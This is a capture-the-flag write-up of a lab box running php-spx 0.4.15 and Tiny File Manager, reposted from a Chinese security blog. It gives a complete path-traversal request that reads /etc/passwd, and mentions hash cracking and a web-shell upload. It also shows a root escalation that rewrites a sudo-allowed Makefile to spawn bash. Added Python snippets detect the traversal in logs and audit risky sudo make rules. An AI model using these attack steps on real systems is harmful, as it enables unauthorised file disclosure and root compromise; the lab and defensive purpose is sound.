PG_SPX

By admin, 2025-05-27 20:03:14

Information gathering:

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.233.108
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-01 09:20 CST
Nmap scan report for 192.168.233.108
Host is up (0.0026s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Tiny File Manager
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   1.84 ms 192.168.45.1
2   1.86 ms 192.168.45.254
3   2.13 ms 192.168.251.1
4   2.38 ms 192.168.233.108

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.60 seconds

Port 80 (HTTP) is open; the site is a Tiny File Manager login page.

Tried the two default credential pairs on the login page; both failed. Next, enumerate directories:

dirsearch -u http://192.168.233.108/

Found a phpinfo page. It shows that the SPX profiling extension is enabled, version 0.4.15 (the box is named SPX; otherwise this would not have come to mind).

Found a path traversal vulnerability in that version online: https://github.com/NoiseByNorthwest/php-spx/issues/251

Send the request (the SPX_KEY parameter must be replaced with the value shown in phpinfo):

GET /index.php?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: 192.168.233.108
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: filemanager=dn7e0ttr0ooqm0fjbnn40pt60b
Upgrade-Insecure-Requests: 1

Successfully read /etc/passwd.
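From the defender's side, the traversal request above leaves a recognisable trace in the Apache access log: an SPX_UI_URI value that climbs out of the UI root. The following Python is an added example for this write-up, not code from the original post or from the php-spx project. It parses combined-format log lines, percent-decodes the SPX_UI_URI parameter repeatedly (so double-encoded %252f.. variants are caught as well) and reports any request whose decoded path contains a .. segment. The log lines are constructed samples.

```python
"""Flag php-spx UI path traversal attempts (SPX_UI_URI containing ..) in
Apache combined-format access logs.

Added example for this write-up; not part of the original post or of the
php-spx project. SAMPLE_LOG is a constructed sample."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined format: client ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one normal UI request, one plain traversal,
# one double-encoded traversal, and one unrelated request.
SAMPLE_LOG = """\
192.168.45.1 - - [01/Mar/2025:09:31:02 +0800] "GET /index.php?SPX_KEY=dev&SPX_UI_URI=/ HTTP/1.1" 200 5121 "-" "Mozilla/5.0"
192.168.45.1 - - [01/Mar/2025:09:32:10 +0800] "GET /index.php?SPX_KEY=dev&SPX_UI_URI=%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1821 "-" "Mozilla/5.0"
192.168.45.1 - - [01/Mar/2025:09:32:44 +0800] "GET /index.php?SPX_KEY=dev&SPX_UI_URI=%252f..%252fvar%252fwww%252fhtml%252findex.php HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Mar/2025:09:33:01 +0800] "GET /index.php HTTP/1.1" 200 3000 "-" "curl/8.0"
"""


def full_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so that a
    double-encoded %252f.. is normalised to /.. before inspection."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_spx_traversal(target):
    """True if the request target carries an SPX_UI_URI whose decoded path
    has a '..' segment, i.e. it tries to leave the UI root."""
    query = urlsplit(target).query
    for raw in parse_qs(query, keep_blank_values=True).get("SPX_UI_URI", []):
        decoded = full_decode(raw).replace("\\", "/")
        if ".." in decoded.split("/"):
            return True
    return False


def find_spx_traversal(log_text):
    """Scan log lines; return (client, time, decoded target) for each hit."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if is_spx_traversal(m["target"]):
            hits.append((m["client"], m["time"], full_decode(m["target"])))
    return hits


if __name__ == "__main__":
    for client, when, target in find_spx_traversal(SAMPLE_LOG):
        print(f"{when} {client} {target}")
```

The check is on path segments rather than on the literal string "%2f..", because the same traversal can be written with mixed case, backslashes or an extra encoding layer; normalising first and then looking for a bare .. segment covers those variants without a long pattern list. Upgrading php-spx past the affected 0.4.15 release and not exposing the SPX UI (or its key) on a production vhost removes the issue at the source.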

When reading index.php, the passwords turned out to be stored as hashes. Copied them into a file and cracked the hashes with john.

One password cracked; logging in as the admin user with it succeeded (it only took about 58 minutes of cracking......)

After logging into the admin panel, upload a shell.

Received a shell as www-data.

Routine enumeration (linpeas.sh, lse.sh, pspy32s) turned up no privilege escalation vector,

but switching to the profiler user with the password of the user account succeeded.

Got the local flag.

Running cat /root/proof.txt directly via sudo failed; sudo -l shows that the user can run /usr/bin/make install -C /home/profiler/php-spx without a password.

The make command depends on the Makefile in that directory, so all that is needed is to rewrite the Makefile and then run the build:

echo -e "install:\n\t/bin/bash" > /home/profiler/php-spx/Makefile
sudo make install -C /home/profiler/php-spx
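For the defender, the weak point here is not make itself but a sudo rule whose Makefile lives under the invoking user's home. The Python below is an added example for this write-up, not from the original post or from php-spx: it parses rule lines in the format sudo -l prints, works out which directory make would read its Makefile from, and reports the rule when the invoker can write that directory or its Makefile (or when no -C is given at all, so make reads from the caller's current directory). The writable-path set in demo() is a constructed stand-in for the box's filesystem; audit_rule defaults to os.access for use on a real host.

```python
"""Audit `sudo -l` rules that let a user run make against a directory the
same user can write (the profiler -> root path in this box).

Added example for this write-up; not part of the original post or of
php-spx. The rule lines and PROFILER_WRITABLE are constructed samples."""
import os
import re
import shlex

# "(root) NOPASSWD: /usr/bin/make install -C /home/profiler/php-spx"
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")
MAKE_BINS = {"make", "gmake"}

# Constructed view of what the invoking user (profiler) can write on the box.
PROFILER_WRITABLE = {
    "/home/profiler/php-spx",
    "/home/profiler/php-spx/Makefile",
    "/tmp",
}


def parse_rule(line):
    """Split a sudo -l rule line into run-as user, tag set and argv."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    tags = {t.strip(": ") for t in m["tags"].split() if t.strip(": ")}
    return {"runas": m["runas"].strip(), "tags": tags, "argv": shlex.split(m["cmd"])}


def make_dir_from_argv(argv):
    """Return the directory make reads its Makefile from, or None if the
    command is not make. Honours -C <dir>, -C<dir> and --directory=<dir>;
    with none of them, make uses the caller's cwd (os.curdir)."""
    if not argv or os.path.basename(argv[0]) not in MAKE_BINS:
        return None
    args = argv[1:]
    for i, a in enumerate(args):
        if a == "-C" and i + 1 < len(args):
            return args[i + 1]
        if a.startswith("--directory="):
            return a.split("=", 1)[1]
        if a.startswith("-C") and len(a) > 2:
            return a[2:]
    return os.curdir


def audit_rule(line, writable=lambda p: os.access(p, os.W_OK)):
    """Return a finding string if the rule runs make on a directory the
    invoker controls; None otherwise. `writable` is injectable so the
    check can run against a constructed filesystem view."""
    rule = parse_rule(line)
    if rule is None:
        return None
    d = make_dir_from_argv(rule["argv"])
    if d is None:
        return None
    if d == os.curdir:
        return f"make as {rule['runas']} reads the Makefile from the invoker's cwd"
    if writable(d) or writable(os.path.join(d, "Makefile")):
        return f"make as {rule['runas']} reads an invoker-writable Makefile under {d}"
    return None


def demo(writable_paths=PROFILER_WRITABLE):
    """Audit constructed sample rules against the constructed writable set."""
    writable = lambda p: os.path.normpath(p) in writable_paths
    rules = [
        "(root) NOPASSWD: /usr/bin/make install -C /home/profiler/php-spx",
        "(root) NOPASSWD: /usr/bin/make install -C /usr/src/php-spx",
        "(root) NOPASSWD: /usr/bin/make install",
        "(root) NOPASSWD: /usr/bin/systemctl status apache2",
    ]
    return {r: audit_rule(r, writable) for r in rules}


if __name__ == "__main__":
    for rule, finding in demo().items():
        print(f"{'FINDING' if finding else 'ok     '}  {rule}" + (f"  -> {finding}" if finding else ""))
```

The fix is to drop the rule, or to have sudo run make only against a root-owned copy of the source tree that the user cannot modify; as long as the rule points into /home/profiler, the Makefile (and therefore the commands run as root) is the invoker's to rewrite.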

Originally published on the WeChat public account EuSRC安全实验室 (EuSRC Security Lab): PG_SPX

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (a corporate or otherwise valid mailbox is recommended to avoid filtering; contact details are on the home page).

When reposting, please keep the link to this article (CN-SEC中文网, with thanks to the original author): https://cn-sec.com/archives/3952386.html